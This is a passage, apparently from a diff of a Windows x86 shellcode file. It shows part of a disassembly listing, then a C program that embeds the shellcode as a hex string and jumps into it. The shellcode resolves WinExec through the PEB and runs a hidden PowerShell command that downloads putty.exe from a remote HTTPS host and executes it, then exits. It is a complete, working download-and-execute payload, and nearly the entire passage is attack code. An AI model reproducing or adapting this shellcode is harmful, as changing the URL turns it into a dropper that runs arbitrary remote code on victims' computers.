0x134: 68436c6965 push 0x65696c43 + 0x139: 682e576562 push 0x6265572e + 0x13e: 68204e6574 push 0x74654e20 + 0x143: 686a656374 push 0x7463656a + 0x148: 68772d4f62 push 0x624f2d77 + 0x14d: 6820284e65 push 0x654e2820 + 0x152: 682226207b push 0x7b202622 + 0x157: 68616e6420 push 0x20646e61 + 0x15c: 68636f6d6d push 0x6d6d6f63 + 0x161: 686c6c202d push 0x2d206c6c + 0x166: 6872736865 push 0x65687372 + 0x16b: 68706f7765 push 0x65776f70 + 0x170: 89e2 mov edx, esp + 0x172: 41 inc ecx + 0x173: 51 push ecx + 0x174: 52 push edx + 0x175: ffd7 call edi + 0x177: e88dfeffff call 9 + 0x17c: 8b34af mov esi, dword ptr [edi + ebp*4] + 0x17f: 01c6 add esi, eax + 0x181: 45 inc ebp + 0x182: 813e45786974 cmp dword ptr [esi], 0x74697845 + 0x188: 75f2 jne 0x17c + 0x18a: 817e0450726f63 cmp dword ptr [esi + 4], 0x636f7250 + 0x191: 75e9 jne 0x17c + 0x193: 8b7a24 mov edi, dword ptr [edx + 0x24] + 0x196: 01c7 add edi, eax + 0x198: 668b2c6f mov bp, word ptr [edi + ebp*2] + 0x19c: 8b7a1c mov edi, dword ptr [edx + 0x1c] + 0x19f: 01c7 add edi, eax + 0x1a1: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] + 0x1a5: 01c7 add edi, eax + 0x1a7: 31c9 xor ecx, ecx + 0x1a9: 51 push ecx + 0x1aa: ffd7 call edi +*/ + +#include + +char shellcode[]=\ + +"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7"; + +main(){(* (int(*)()) shellcode)();} \ No newline at end of file